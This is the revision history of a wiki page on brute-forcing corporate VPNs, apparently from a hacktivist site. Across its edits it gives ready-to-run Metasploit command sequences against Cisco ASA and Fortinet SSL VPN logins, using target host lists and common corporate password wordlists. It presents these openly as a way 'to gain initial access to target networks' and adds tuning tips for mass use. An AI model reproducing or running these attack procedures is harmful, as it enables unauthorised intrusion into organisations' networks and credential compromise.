VPN brute forcing - Revision history

Booda at 12:19, 30 March 2024

2024-03-30T12:19:50Z

← Older revision		Revision as of 12:19, 30 March 2024
Line 1:		Line 1:
	[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use smaller user and password files.		[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-users.txt smaller user] and [https://github.com/projectdiscovery/nuclei-templates/blob/main/helpers/wordlists/wp-passwords.txt password] files.

	~~You can use Seclists for common [~~https://~~github~~.~~com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https:~~/~~/github~~.~~com~~/~~danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.~~		Word lists:
			* https://enlacehacktivista.org/index.php/Initial_Access_Tactics,_techniques_and_procedures#Common_and_leaked_passwords

	== CISCO ==		== CISCO ==

Booda at 18:18, 9 September 2023

2023-09-09T18:18:59Z

← Older revision		Revision as of 18:18, 9 September 2023
Line 1:		Line 1:
	[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a username and password file will cause the module to stall for a very long time. To fix this issue use smaller user and password files.		[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large username and password file will cause the module to stall for a very long time. To fix this issue use smaller user and password files.

	You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.		You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.

Booda at 18:18, 9 September 2023

2023-09-09T18:18:25Z

← Older revision		Revision as of 18:18, 9 September 2023
Line 1:		Line 1:
	[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a ~~large IP host~~ file will cause the module to ~~hang~~ for a very long time. To fix this issue ~~split the large host file down into multiple sub~~ files ~~and run the module against each smaller host file individually~~.		[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a username and password file will cause the module to stall for a very long time. To fix this issue use smaller user and password files.

	You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.		You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.

	== CISCO ==		== CISCO ==
	<pre>		<pre>

Booda at 09:40, 1 September 2023

2023-09-01T09:40:04Z

← Older revision		Revision as of 09:40, 1 September 2023
Line 1:		Line 1:
	[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ~~ports~~]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this issue split the large host file down into multiple sub files and run the module against each smaller host file individually.		[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass port scanning]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this issue split the large host file down into multiple sub files and run the module against each smaller host file individually.

	You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.		You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.

Booda at 18:15, 31 August 2023

2023-08-31T18:15:44Z

← Older revision		Revision as of 18:15, 31 August 2023
Line 1:		Line 1:
	[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this split a large host file down into multiple sub files and run the module against smaller host ~~files~~.		[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this issue split the large host file down into multiple sub files and run the module against each smaller host file individually.

	You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.		You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.

Booda: /* FORTI SSL VPN */

2023-08-31T18:12:19Z

FORTI SSL VPN

← Older revision		Revision as of 18:12, 31 August 2023
Line 21:		Line 21:
	sudo systemctl start postgresql		sudo systemctl start postgresql
	msfdb init		msfdb init

	msfconsole		msfconsole
	use auxiliary/scanner/http/fortinet_ssl_vpn		use auxiliary/scanner/http/fortinet_ssl_vpn

Booda: /* CISCO */

2023-08-31T18:12:12Z

CISCO

← Older revision		Revision as of 18:12, 31 August 2023
Line 6:		Line 6:
	sudo systemctl start postgresql		sudo systemctl start postgresql
	msfdb init		msfdb init

	msfconsole		msfconsole
	use auxiliary/scanner/http/cisco_ssl_vpn		use auxiliary/scanner/http/cisco_ssl_vpn

Booda at 18:09, 31 August 2023

2023-08-31T18:09:58Z

← Older revision		Revision as of 18:09, 31 August 2023
Line 1:		Line 1:
	Brute force common corporate VPNs to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports].		[https://www.rapid7.com/blog/post/2023/08/29/under-siege-rapid7-observed-exploitation-of-cisco-asa-ssl-vpns Brute force common corporate VPNs] to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports]. For this to work properly using a large IP host file will cause the module to hang for a very long time. To fix this split a large host file down into multiple sub files and run the module against smaller host files.

			You can use Seclists for common [https://github.com/danielmiessler/SecLists/blob/master/Usernames/top-usernames-shortlist.txt usernames] and [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst passwords] to brute-force with.
	== CISCO ==		== CISCO ==
	<pre>		<pre>
Line 28:		Line 29:
	run		run
	</pre>		</pre>

	~~pass.txt: https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst~~

Booda at 16:58, 2 August 2023

2023-08-02T16:58:24Z

← Older revision		Revision as of 16:58, 2 August 2023
Line 1:		Line 1:
	~~See~~ [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports].		Brute force common corporate VPNs to gain initial access to target networks. [https://enlacehacktivista.org/index.php?title=Exploitation#Metasploit Install metasploit] and then see [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports].

	== CISCO ==		== CISCO ==

Booda: VPN brute forcing

2023-08-02T01:54:05Z

VPN brute forcing

New page

See [https://enlacehacktivista.org/index.php?title=Initial_Access_Tactics,_techniques_and_procedures#Spray_and_pray Initial access TTPs for mass scanning ports].

== CISCO ==
<pre>
sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/cisco_ssl_vpn
set RHOSTS file:/home/targets_443.txt
set RPORT 443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
</pre>

== FORTI SSL VPN ==
<pre>
sudo systemctl start postgresql
msfdb init
msfconsole
use auxiliary/scanner/http/fortinet_ssl_vpn
set RHOSTS file:/home/targets_10443.txt
set RPORT 10443
set USER_FILE /home/users.txt
set PASS_FILE /home/pass.txt
set threads 10
run
</pre>

pass.txt: https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst